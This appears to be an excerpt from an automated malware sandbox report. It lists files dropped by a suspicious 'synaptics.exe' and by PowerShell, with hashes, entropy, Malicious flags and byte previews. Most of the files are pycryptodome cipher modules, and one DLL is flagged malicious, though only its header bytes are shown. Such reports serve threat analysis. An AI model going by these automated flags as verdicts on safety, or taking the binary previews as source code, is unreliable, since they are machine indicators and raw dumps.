                                                                                                                                                                                                            Preview:o.......\..g.U.......................@...s....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.e...Z.d.d...Z.e...Z.G.d.d...d.e...Z d.d...Z!e!d.d.d...Z"G.d.d...d.e...Z#d.d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c........................sl...d.d.l.m.}...d.}.|.d.|...}.z.....f.d
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17082
                                                                                                                                                                                                            Entropy (8bit):5.335449394593351
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:8H+RW9/ScqbkrPM4JjaTlTbIl67Wa+7l9A:8ew9/Zw4c7Fc9A
                                                                                                                                                                                                            MD5:765665F5ED29C64E5447DB0985E30B3E
                                                                                                                                                                                                            SHA1:DF9BF9308D5C6C727AFB3DA442C32ABF09B58BF9
                                                                                                                                                                                                            SHA-256:F1A94C81490197CEAEF4D6828FC1A23FE1949270BA6DED951D3787C825065578
                                                                                                                                                                                                            SHA-512:D0520F2B6F3B7880ABAE658E3CE1773C9839115E6B28DC141890B8545361809F6994B3BE85C5FB7B3AB2DDDFB497868DD20CA28888FD51C68314C5A2DC53DD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.U.......................@...s....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.e...Z.d.d...Z.e...Z.G.d.d...d.e...Z d.d...Z!e!d.d.d...Z"G.d.d...d.e...Z#d.d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c........................sl...d.d.l.m.}...d.}.|.d.|...}.z.....f.d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14690
                                                                                                                                                                                                            Entropy (8bit):5.2419605137673795
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4qHGdezRYrM3R4hWeWMCe47h+7xH5Aud109Q:4sGdeOMBulT5yiZ1d109Q
                                                                                                                                                                                                            MD5:B4762253C63B8B069735124578D3819F
                                                                                                                                                                                                            SHA1:471A07F87B59B23D54EF009265AB0C3F889B60CE
                                                                                                                                                                                                            SHA-256:02FD6B92B6F00F8D719AC924493D45341B078CAE60A2A35131478AD8F92414BB
                                                                                                                                                                                                            SHA-512:73DD27904BE42F487A88E61FAF2180387F45BC53F1426EC3EBB8785FB1972E34FBF9C3072BBB20956FC7BE3F7DB65C8704EEE702ADD4D1DB398C7BACA6681B80
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.O.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>. >>> key = get_ran
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14664
                                                                                                                                                                                                            Entropy (8bit):5.243149888646542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:5qHGdezRprM0R4K/eWAe4hvDCxH5DBbaZ0dQ:5sGde/MMF2ygOZ5aZ0dQ
                                                                                                                                                                                                            MD5:4DD31D2EC60B500FC4C60E41F5725187
                                                                                                                                                                                                            SHA1:FEEFCB16321546E1183B3A84076E388200B83EEE
                                                                                                                                                                                                            SHA-256:C2C433F2A2511DD4D2461D124AD6F90D763A62555CF69B3E3E2B7881447BDC69
                                                                                                                                                                                                            SHA-512:BCFD7C274FD0A232BA975037FA0964F91CFD271F6D8E0813718111D2CE640939731224A80DB41386B3EB4298AE2B3EF87ADAAE23151C52F783D2925D4AEB21E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.O.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>. >>> key = get_ran
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7396
                                                                                                                                                                                                            Entropy (8bit):5.089452077113408
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:YA6kv9jQvHHq12nxIN3hSN9S5esIUGGt834mGPMsQNPcKin8HaGTvt834+5pVPIJ:XyHqAxI6w8s9GkU4RRlGTVU4AEJBt
                                                                                                                                                                                                            MD5:46EB1E7B90F1B515DD1E5AA8FEE3DAF3
                                                                                                                                                                                                            SHA1:8253850B7C1FA0797332660E6B1E7C964150AED3
                                                                                                                                                                                                            SHA-256:2E683131734083B73C9A49BFB38141585115D942DB2BFC4A925CC77D1F1AA999
                                                                                                                                                                                                            SHA-512:E06CABD8F0879D2449D98D28671EB006EC723BA5FBFEA1445EF4CA181F97968408912809B739D37B6519BC373D854FB0FD905BC27D1F57C47AF2390EB6BB1428
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.(.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,. const uint8
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7370
                                                                                                                                                                                                            Entropy (8bit):5.08916413629736
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9A6kv9jQvHHq12nxIN3hSpA5esIUGGt834mGPMsQN7t/z8HaGTvt834+5pcRJ6Xn:CyHqAxIt8s9GkU4yZlGTVU4JCoq/1l
                                                                                                                                                                                                            MD5:C4755D6AF52974BC6C43A55166EE512E
                                                                                                                                                                                                            SHA1:8154C54ECA8A337551C9182DDD19C634E1940DE9
                                                                                                                                                                                                            SHA-256:5083CC83F81378F4089DA1C1648C98B0B2BB0990E3A35794F9BDB172CFD20252
                                                                                                                                                                                                            SHA-512:D47D94467BDAD880BDB56B7FFFA56DB8C736C210A3BD4E7B52F718CB4B460B57B0FD125417617E2E1D76844882253023728453CBB1D8C9E2EB539E4C7AD4F9D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.(.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,. const uint8
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4852
                                                                                                                                                                                                            Entropy (8bit):5.239613357871433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HV8N+A+XX8i2Kt834mGPU8Et83426B9nxBXrV7m1OI:HU+A+sYU448KU42m9xHmgI
                                                                                                                                                                                                            MD5:0E9F605A75A89058F9250827BDCF414F
                                                                                                                                                                                                            SHA1:355244BDF19215098DA2063452299A38087BFCC7
                                                                                                                                                                                                            SHA-256:4E6887A200F9CF892D0CC162CDB1483476228F07E95521CD426A3A8B92F51DC3
                                                                                                                                                                                                            SHA-512:76A77AE9AA9E71B21A36FFF4DC586E1ACACCE1DDAAA6C41A277402C8A5580C248D1754E41C7AB4D5321EFE54CCD214F5BCF2FBF3513C655B52455C9414DC1A79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4826
                                                                                                                                                                                                            Entropy (8bit):5.242025355903295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MV8N+A+Xoyi2Kt834mGPUGt8340y9nxBX4o7UIDFI:MU+A+dYU44kU4H9xxUIZI
                                                                                                                                                                                                            MD5:96E92437E699510D46B95BE5FA860B6F
                                                                                                                                                                                                            SHA1:7CC41D47229EC4BB1F34CC3D72BBF80F0BED0533
                                                                                                                                                                                                            SHA-256:5A05289B791F01A7B481FC6122B1FF2EDDEC73A2E988D58777EFCF38DB1C22F3
                                                                                                                                                                                                            SHA-512:244080DD464A142D4E9783B57FD871E69F75308F5A292FDDC501D0A7379A175230869B1A26BBE50E8E8B6FD364D7B6DB9C62422A01E35C9AE792025F4289C2EC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4826
                                                                                                                                                                                                            Entropy (8bit):5.242025355903295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MV8N+A+Xoyi2Kt834mGPUGt8340y9nxBX4o7UIDFI:MU+A+dYU44kU4H9xxUIZI
                                                                                                                                                                                                            MD5:96E92437E699510D46B95BE5FA860B6F
                                                                                                                                                                                                            SHA1:7CC41D47229EC4BB1F34CC3D72BBF80F0BED0533
                                                                                                                                                                                                            SHA-256:5A05289B791F01A7B481FC6122B1FF2EDDEC73A2E988D58777EFCF38DB1C22F3
                                                                                                                                                                                                            SHA-512:244080DD464A142D4E9783B57FD871E69F75308F5A292FDDC501D0A7379A175230869B1A26BBE50E8E8B6FD364D7B6DB9C62422A01E35C9AE792025F4289C2EC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11853
                                                                                                                                                                                                            Entropy (8bit):5.255791724908358
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:rLqjzBGjN4xiUBcrEAesGdzGdkT6TIf6hYH97An4a05BbxQrBCp:Hq45pUBcrEJfMfIfAo71aIs1C
                                                                                                                                                                                                            MD5:1F52600FC7806517B90C31C424EBC18D
                                                                                                                                                                                                            SHA1:892571DABE3AEC21752EEEAA37EA6253D283A174
                                                                                                                                                                                                            SHA-256:A1D0DACD9B85785C937759895BFCE88659C236B229C05CF2222FCEB611BB4727
                                                                                                                                                                                                            SHA-512:BB26333F94456F732A68A939244C750A3EED5AD36F3ABA3C82EADDAB63C0D13FFA35E5C4AD12CAEFCACA4CC991535C5AA1ECC8F0C76D217EB427DB0D59D08991
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g!8.......................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc....................@...sl...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11827
                                                                                                                                                                                                            Entropy (8bit):5.2510371455888585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:OLqjzBGjN4xYwBKXrEApsGdDGdkT+WIp6hW97iuA4al45B3xQrBBQ:gq45XwBarEWfYiIpAe7JaG81m
                                                                                                                                                                                                            MD5:353F39229EBEF79A41874A9CBEDE71A1
                                                                                                                                                                                                            SHA1:F94E563C78FB0F9036ABBD904670F02879CF710B
                                                                                                                                                                                                            SHA-256:3FBDF1AA4873D156018BB930FC6F5264F5D8700746C4410D34BD1746FEF05944
                                                                                                                                                                                                            SHA-512:8E8E7D1C4B2A10ECD467787B805A90D0244A643985D4A00E0FF69EBA431F513EED2CDB6F3AF6319584D587AA25D3697AF3A522E5972D4E8585B4D482EFB72887
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g!8.......................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc....................@...sl...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1565
                                                                                                                                                                                                            Entropy (8bit):4.68131631118353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:8KD8osetp6ePCXjDRy2NjKKJwAB22lMFZk5F5186hnnjGwj:8KwosM6p1y2lMi860wj
                                                                                                                                                                                                            MD5:E3A4A246337509570625F9E6D7D78C0E
                                                                                                                                                                                                            SHA1:73907C862AFEB671DD897A7AA7C9076BF9B3419A
                                                                                                                                                                                                            SHA-256:DB8C77FD0E1A172ED3E902E062EB310EB34A01532609012BEB4468B8E7875EA3
                                                                                                                                                                                                            SHA-512:111DE7A3E97E5ACA544BC842F479C16AC068F0FD405DB5F81E784728D78093CB29C3FD44A5A0F452D181D997BBD63FBC1FF4ABCF78398C3A49B56AD2F57E083A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gI........................@...s2...d.d.l.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Crypto.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c....................C...sP...t.|...t.|...k.r.t.d.....t...t.|...t.t.|.....t.|...t.t.|.....t.|...t.|.....}.|.S.).Nz.Incorrect output length)...len..ValueErr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1539
                                                                                                                                                                                                            Entropy (8bit):4.658358185078957
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1KD8osetp6ePCXjDRy2NjKKJwABNfKxmZk5F5186hnnj5Mwj:1KwosM6p1hKV860wj
                                                                                                                                                                                                            MD5:B061A277EB9CE1A6CA7013B7E267FFCC
                                                                                                                                                                                                            SHA1:D32D1DCA060D26E668E9B0CD5688F036ABD6D22C
                                                                                                                                                                                                            SHA-256:7B93AAD4EDE20DD45AD9BE41FB3CEE34C9FE0E905E3564EF63C887890BE9A662
                                                                                                                                                                                                            SHA-512:402E7A89282998C3B92E994839DF51FC12D6BDFEBB9173CB732C228F1F397D45147F957E205219EC7A26D9E921F716460EC3A355344B0B489CD1E5DA070F8210
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gI........................@...s2...d.d.l.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Crypto.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c....................C...sP...t.|...t.|...k.r.t.d.....t...t.|...t.t.|.....t.|...t.t.|.....t.|...t.|.....}.|.S.).Nz.Incorrect output length)...len..ValueErr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):5.399276861176415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:z1YzVPEjHIDVhHQWejOU6PYxTWC80JuCza59lk27MVnbEN:x5ojH4jTAYd6Cm595anbO
                                                                                                                                                                                                            MD5:4247BEE90E486F7709496E3C8D5DD1FC
                                                                                                                                                                                                            SHA1:C5AB0BD84FC70749051616F8C68C0EBA8C74A7BE
                                                                                                                                                                                                            SHA-256:195F5C7A9954C3E4C726F8E720DD300D603B0FC9189DFBA80791721B6E3BB6A9
                                                                                                                                                                                                            SHA-512:79AE6D624378902A9EBC8A6EA146C12F2C706C7CFEA71FF26A81568284BEF0245BFB652DB4989DF9994FBB670585ADDB18CDB835E70A5D1D8289DAB08BC945AF
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X.Q.6.Q.6.Q.6.X..U.6...7.S.6...7.R.6.Q.7.p.6...3.Z.6...2.[.6...5.P.6..>.P.6..6.P.6....P.6..4.P.6.RichQ.6.................PE..L...`..f...........!................N........0...............................p............@..........................4......L5..d....P.......................`..X....0...............................0..@............0..t............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..X....`.......(..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11181
                                                                                                                                                                                                            Entropy (8bit):4.6088680499881525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IY/5xlJT9O++U4/2+2U4+B0Xgvz:0rskrs9VqLzJJGTe+2T+Bp
                                                                                                                                                                                                            MD5:5391E17052FA07E0183AAA6C3AB6D344
                                                                                                                                                                                                            SHA1:31D25884252B3BFB909E20935C8447645E4C233A
                                                                                                                                                                                                            SHA-256:4707CD383304E7B5A84330F45EB3E49C72E905072E825859B54D033C87A0AFE7
                                                                                                                                                                                                            SHA-512:C134A89F9E6A02942AEA745A6F1232091841EB141874C8645448451B2857FEC4D3384B46FD054643673F083A8FF2D9B204CBA87F53FDD5CEA179AB619F36F8C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):712
                                                                                                                                                                                                            Entropy (8bit):4.750220080456401
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                            MD5:30DD017C0985A1EFF693D631609C1DB6
                                                                                                                                                                                                            SHA1:378924C68A2872C951B6AB0291014CD3DD3C3B9C
                                                                                                                                                                                                            SHA-256:BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
